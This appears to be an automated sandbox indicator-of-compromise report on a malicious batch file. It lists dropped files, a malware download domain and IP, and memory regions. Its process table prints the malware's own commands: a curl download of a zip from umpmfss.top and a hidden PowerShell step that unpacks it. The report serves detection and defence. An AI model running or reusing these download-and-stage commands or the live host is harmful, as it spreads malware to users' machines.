IOC Report
batch file malware.bat


Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| batch file malware.bat | DOS batch file, ASCII text, with CRLF line terminators | initial sample | malicious |
| C:\Users\user\AppData\Roaming\count.zip | HTML document, ASCII text | dropped | malicious |
| C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdy1a0js.m3a.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pxt3qzyx.ud3.ps1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xl1i4x4w.iow.psm1 | ASCII text, with no line terminators | dropped | |
| C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zy4z3wuk.130.psm1 | ASCII text, with no line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Windows\System32\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\batch file malware.bat" " | malicious |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell -WindowStyle Hidden -Command "Expand-Archive -LiteralPath 'C:\Users\user\AppData\Roaming\count.zip' -DestinationPath 'C:\Users\user\AppData\Roaming\MyApp23' -Force" | malicious |
| C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
| C:\Windows\System32\curl.exe | curl -s -o "C:\Users\user\AppData\Roaming\count.zip" "https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c" | |

URLs

| Name | IP | Malicious |
|---|---|---|
| https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cl | unknown | |
| https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c23 | unknown | |
| https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cLOCALAPPDATA=C: | unknown | |
| https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98cZ3 | unknown | |
| https://umpmfss.top/files/files/Amount.zip?da05d1c18e22cab98c | 77.83.199.142 | |

Domains

| Name | IP | Malicious |
|---|---|---|
| umpmfss.top | 77.83.199.142 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 77.83.199.142 | umpmfss.top | Lithuania | |
| 127.0.0.1 | unknown | unknown | |

Memdumps

| Base Address | Region type | Protect | Malicious |
|---|---|---|---|
| 25BD21AF000 | heap | page read and write | |
| 25BD2290000 | heap | page read and write | |
| 25BD21F5000 | heap | page read and write | |
| 25BD21A3000 | heap | page read and write | |
| 25BD2180000 | remote allocation | page read and write | |
| 25BD21DA000 | heap | page read and write | |
| 25BD21CC000 | heap | page read and write | |
| 25BD22B0000 | heap | page read and write | |
| 25BD220F000 | heap | page read and write | |
| 25BD21F5000 | heap | page read and write | |
| 25BD21B0000 | heap | page read and write | |
| 25BD21CB000 | heap | page read and write | |
| 25BD21DF000 | heap | page read and write | |
| 25BD2190000 | heap | page read and write | |
| 25BD21A9000 | heap | page read and write | |
| 25BD21AA000 | heap | page read and write | |
| 25BD220F000 | heap | page read and write | |
| 25BD21AF000 | heap | page read and write | |
| 25BD21DB000 | heap | page read and write | |
| 25BD21A6000 | heap | page read and write | |
| 25BD21DE000 | heap | page read and write | |
| 25BD21CB000 | heap | page read and write | |
| 25BD21AF000 | heap | page read and write | |
| 25BD21AE000 | heap | page read and write | |
| 25BD2404000 | heap | page read and write | |
| 25BD20A0000 | heap | page read and write | |
| 25BD21A1000 | heap | page read and write | |
| 25BD2180000 | remote allocation | page read and write | |
| 25BD220F000 | heap | page read and write | |
| 25BD21E5000 | heap | page read and write | |
| 25BD21DA000 | heap | page read and write | |
| 7A1D2FC000 | stack | page read and write | |
| 25BD2197000 | heap | page read and write | |
| 25BD2400000 | heap | page read and write | |
| 7A1D4FE000 | stack | page read and write | |
| 25BD21AD000 | heap | page read and write | |
| 25BD21CC000 | heap | page read and write | |
| 25BD21B2000 | heap | page read and write | |
| 25BD2180000 | remote allocation | page read and write | |
| 7A1D3FF000 | stack | page read and write | |

30 further memdumps are not shown in this listing.